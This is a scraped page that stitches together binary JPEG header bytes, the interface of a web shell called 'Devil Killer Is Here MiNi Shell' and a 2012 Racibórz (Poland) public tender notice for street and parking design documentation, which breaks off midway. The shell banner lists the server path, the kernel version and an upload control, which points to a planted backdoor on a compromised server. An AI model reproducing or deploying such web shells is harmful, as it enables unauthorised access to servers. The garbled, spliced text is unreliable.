JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120208/32491-N-2012.html

<p class="kh_header"><b>Racibórz: Opracowanie dokumentacji projektowo-kosztorysowej  na remont ulic, parkingów i chodników w  Raciborzu</b><br>
<b>Numer ogłoszenia: 32491 - 2012; data zamieszczenia: 08.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Racibórz , ul. Stefana Batorego 6, 47-400 Racibórz, woj. śląskie, tel. 032 7550710, faks 032 7550725.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bipraciborz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo-kosztorysowej  na remont ulic, parkingów i chodników w  Raciborzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług obejmujących opracowanie dokumentacji projektowej, służących do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Przedmiot zamówienia został podzielony na 7 wyodrębnionych części.

Część I -  Opracowanie dokumentacji projektowo-kosztorysowej na budowę zatoki parkingowej na ul. Markowickiej (prawa strona od ul. Leszka Raciborskiego do ul. E. Plater)   w Raciborzu.

1).Podstawowe dane techniczne do projektowania:
a). Parametry techniczne :
- powierzchnia opracowania ok. 1000 m2 (ok. 60 stanowisk postojowych dla samochodów osobowych, chodnik),
-parametry techniczne należy przyjąć jak dla ulic klasy L 
-wymiary stanowisk postojowych należy przyjąć zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej  z dnia 2  marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 1999 r., nr 43, poz.430)
b). Zakres inwestycji:
- rozbiórka istniejącej nawierzchni,
- konstrukcja nawierzchni na chodniku z kostki betonowej grubości 6 cm na podbudowie z kruszywa naturalnego lub tłucznia kamiennego,
- konstrukcja nawierzchni  zatoki postojowej z płyt ażurowych betonowych na podbudowie z  tłucznia kamiennego z wypełnieniem otworów niesortem bazaltowym, 
c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
- 6 egz. projektu w formie papierowej,
- 3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf

Część  II - Przebudowa ulicy Księżycowej w Raciborzu

 Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość odcinka ulicy ok. 130 mb 
- szerokość pasa drogowego zmienna od  4,50 m do 5,0 m
b). Zakres inwestycji:
- rozebranie nawierzchni bitumicznej jezdni ulicy wraz z podbudową,
- rozebranie krawężników, 
- rozebranie opaski z płyt betonowych, betonu lanego i płyt betonowych ażurowych,
- wykonanie nawierzchni z kostki brukowej betonowej (ze względu na ograniczoną szerokość pasa drogowego proponuje się wykonanie ciągu pieszo - jezdnego) na podbudowie z kruszywa naturalnego lub tłucznia kamiennego,
- odwodnienie nawierzchni (z wykorzystaniem opinii ZWiK w Raciborzu),
- weryfikacja organizacji ruchu drogowego. 
c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wymagane uzgodnienia.
d). Inne istotne informacje:
 Dokumentacja winna być opracowana w 6 egzemplarzach i 2 kompletach zapisanych w wersji elektronicznej w formacie pdf 

Część  III - Remont ul. Markowickiej w Raciborzu (od ul. Emilii Plater do przejazdu PKP).
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość odcinka ulicy ok. 170 mb 
- szerokość jezdni 6,50 m,
-  szerokość chodników 1,50 m,
-  szerokość ciągu pieszo-rowerowego 2,50 m
-  powierzchnia parkingu dla samochodów osobowych wraz z drogą manewrową ok. 1400 m2
b). Zakres inwestycji:
- rozebranie nawierzchni bitumicznej jezdni ulicy i parkingu,
- wyrównanie istniejącej podbudowy betonem asfaltowym (średnia grub. 4 cm), 
- wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej grysowej grub. warstwy po zagęszczeniu 4 cm,
- wymiana krawężników betonowych o wym.15*30 cm  i obrzeży betonowych o wym. 30*8 cm,
- wymiana nawierzchni chodnika z płyt betonowych o wym. 50*50*7 cm na  kostkę brukową betonową o grub. 6 cm szarą (chodnik prawostronny),
- wymiana nawierzchni chodnika z płyt betonowych o wym. 50*50*7 cm na ciąg pieszo-rowerowy  szerokości 2,5 m o nawierzchni z asfaltobetonu na podbudowie tłuczniowej ( chodnik lewostronny),
- poprawa odwodnienia jezdni ulicy i nawierzchni parkingu,
- poprawa organizacji ruchu na parkingu. 
c). Zakres opracowania:
- Projekt parkingu poprzedzony trzema  koncepcjami  usytuowania miejsc parkingowych   z uwzględnieniem ewentualnej likwidacji terenu zielonego oraz umożliwienia nawracania autobusów komunikacji miejskiej, 
-  projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
-  projekt zagospodarowania terenu,
-  kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wymagane uzgodnienia.
d). Inne istotne informacje:
 Dokumentacja winna być opracowana: 
1).6 egz. projektu w formie papierowej,
2).3 egz. przedmiarów i kosztorysów inwestorskich,
3). 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf. 

Część  IV - Wykonanie chodnika ul. Wygonowa (od ul. Gawliny do ul. Sosienkowej) - przebudowa.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość ciągu pieszo-jezdnego ok. 370 mb ( od ul.Gawliny do ul. Sosienkowej po stronie nieparzystych numerów posesji) 
- szerokość ciągu pieszo-jezdnego  2,5 m
- wymiary wjazdów należy ustalić indywidualnie dla każdej posesji

b). Zakres inwestycji:
- rozebranie istniejącej  nawierzchni chodnika i wjazdów (beton asfaltowy, beton lany) wraz z podbudową,
- wymiana krawężników betonowych, 
- wykonanie nawierzchni ciągu pieszo-rowerowego oraz wjazdów do posesji z asfaltobetonu  na podbudowie z tłucznia kamiennego,
- poprawa odwodnienia w sąsiedztwie drogi gminnej dojazdowej do posesji nr 19,
- przed wykonaniem  zjazdu z drogi gminnej tłuczniowej dojazdowej do posesji  nr 19 należy poprawić jej odwodnienie (ujęcie spływającej wody na jezdnię  ul. Gawliny).  

c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
-  projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
-  specyfikacje techniczne wykonania i odbioru robót,
-  wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.

Część  V - Wykonanie chodnika i przebudowa wjazdów - ul. Osiedleńcza.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość chodnika ok. 360 mb ( od ul. Ocickiej do ul. Górnej po stronie nieparzystych numerów posesji) 
- szerokość chodnika  zmienna od  1,50 m do 2,0 m
- wymiary wjazdów należy ustalić indywidualnie dla każdej posesji

b). Zakres inwestycji:
- rozebranie istniejącej  nawierzchni chodnika i wjazdów (beton lany, kostka brukowa, płyty betonowe) wraz z podbudową,
-  regulacja krawężników kamiennych z wymianą uszkodzonych, 
- regulacja wpustów ściekowych ulicznych-bocznych  z wymianą uszkodzonych,
- wykonanie nawierzchni chodnika z kostki brukowej betonowej grub. 6 cm (szarej) i wjazdów z kostki brukowej betonowe grub. 8 cm (czerwonej) na podbudowie z kruszywa naturalnego lub tłucznia kamiennego.
c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu
- kosztorys inwestorski wraz z przedmiarem robót,
-   projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
-    wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
- egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf. 

Część  VI - Przebudowa ul. Odrodzenia - bocznej w Raciborzu
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
-  długość odcinka ulicy ok. 570 mb (od drogi wojewódzkiej nr 923 do końca  zabudowy tj. posesji nr 17) 
- szerokość jezdni zmienna od 4,50 m do 3,0 m,
b). Zakres inwestycji:
- rozebranie nawierzchni jezdni tłuczniowo - gruntowej,
- wykonanie nawierzchni jezdni  z betonu asfaltowego (w-wa wiążąca grub. 4 cm i w-wa ścieralna grub. 4 cm z mieszanki mineralno-asfaltowej grysowej) na podbudowie z tłucznia kamiennego,
- utwardzenie poboczy destruktem asfaltowym lub tłuczniem kamiennym,
- poprawa odwodnienia drogi (profilowanie i stabilizacja skarpy rowu przydrożnego, naprawa przepustów pod drogą i zjazdami itp.),

c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
-  specyfikacje techniczne wykonania i odbioru robót,
- wszystkie wymagane uzgodnienia w tym  uzgodnienie zjazdu z drogi gminnej na drogę wojewódzką nr 923 z Zarządem Dróg Wojewódzkich w Katowicach.
d).Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
- 3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.

Część  VII -  Remont sięgaczy przy  ul. Szczecińskiej - sięgacz nr 6

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość sięgacza nr 6 wraz z wjazdami ok. 50 mb 
- szerokość ciągu pieszo-jezdnego 5,0 m
b). Zakres inwestycji:
- rozebranie nawierzchni z płyt drogowych żelbetowych wraz z podbudową,
- wykonanie nawierzchni z kostki brukowej betonowej, szarej grub. 8 cm na podbudowie z kruszywa naturalnego lub tłucznia kamiennego,
- poprawa odwodnienie nawierzchni (regulacja istniejących studzienek kanalizacyjnych  rewizyjnej i ściekowej, wymiana odwodnienia liniowego).
- płyty drogowe żelbetowe nadające się do ponownej zabudowy planuje się przeznaczyć na utwardzenie drogi tymczasowej dojazdowej do posesji przy ul. Koszalińskiej.
c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 0 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień  umowy w niżej wymienionych  przypadkach:

1).Zmiany mające wpływ na termin wykonania przedmiotu umowy - możliwa jest zmiana terminu wykonania umowy ze względu na:

a). oczekiwanie Wykonawcy na niezbędne opinie, decyzje, zezwolenia, uzgodnienia itp. wymagane obowiązującymi przepisami prawa, o ile okres wyczekiwania Wykonawcy nie wynika z braku podjęcia niezwłocznie lub wadliwego wykonywania przez Wykonawcę czynności niezbędnych do zainicjowania oraz prawidłowego przeprowadzenia właściwego postępowania celem uzyskania wskazanych powyżej niezbędnych  opinii, decyzji, zezwoleń, uzgodnień, itp., o okres oczekiwania wykraczający poza termin wynikający z przepisów zobowiązanego do wydania  opinii, decyzji, zezwoleń, uzgodnień, itp.

2). Zmiany mające wpływ na wysokość wynagrodzenia - zmiana stawki podatku od  towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bipraciborz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Racibórz, Referat Zamówień Publicznych, ul. Stefana Batorego 6, 47-400 Racibórz, pok. 310.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2012 godzina 11:30, miejsce: Urząd Miasta Racibórz, Referat Zamówień Publicznych, ul. Stefana Batorego 6, 47-400 Racibórz, pok. 310.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na budowę zatoki parkingowej na ul. Markowickiej (prawa strona od ul. Leszka Raciborskiego do ul. E. Plater)   w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.


2).Podstawowe dane techniczne do projektowania:
a). Parametry techniczne :
- powierzchnia opracowania ok. 1000 m2 (ok. 60 stanowisk postojowych dla samochodów osobowych, chodnik),
-parametry techniczne należy przyjąć jak dla ulic klasy L 
-wymiary stanowisk postojowych należy przyjąć zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej  z dnia 2  marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne  i ich usytuowanie (Dz. U. z 1999 r., nr 43, poz.430)
b). Zakres inwestycji:
- rozbiórka istniejącej nawierzchni,
- konstrukcja nawierzchni na chodniku z kostki betonowej grubości 6 cm na podbudowie z kruszywa naturalnego lub tłucznia kamiennego,
- konstrukcja nawierzchni  zatoki postojowej z płyt ażurowych betonowych na podbudowie z  tłucznia kamiennego z wypełnieniem otworów niesortem bazaltowym, 
c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
- 6 egz. projektu w formie papierowej,
- 3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ulicy Księżycowej w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość odcinka ulicy ok. 130 mb 
- szerokość pasa drogowego zmienna od  4,50 m do 5,0 m
b). Zakres inwestycji:
- rozebranie nawierzchni bitumicznej jezdni ulicy wraz z podbudową,
- rozebranie krawężników, 
- rozebranie opaski z płyt betonowych, betonu lanego i płyt betonowych ażurowych,
- wykonanie nawierzchni z kostki brukowej betonowej (ze względu na ograniczoną szerokość pasa drogowego proponuje się wykonanie ciągu pieszo - jezdnego) na podbudowie z kruszywa naturalnego lub tłucznia kamiennego,
- odwodnienie nawierzchni (z wykorzystaniem opinii ZWiK w Raciborzu),
- weryfikacja organizacji ruchu drogowego. 

c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wymagane uzgodnienia.
d) Inne istotne informacje:
 Dokumentacja winna być opracowana w 6 egzemplarzach i 2 kompletach zapisanych w wersji elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont ul. Markowickiej w Raciborzu (od ul. Emilii Plater do przejazdu PKP).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość odcinka ulicy ok. 170 mb 
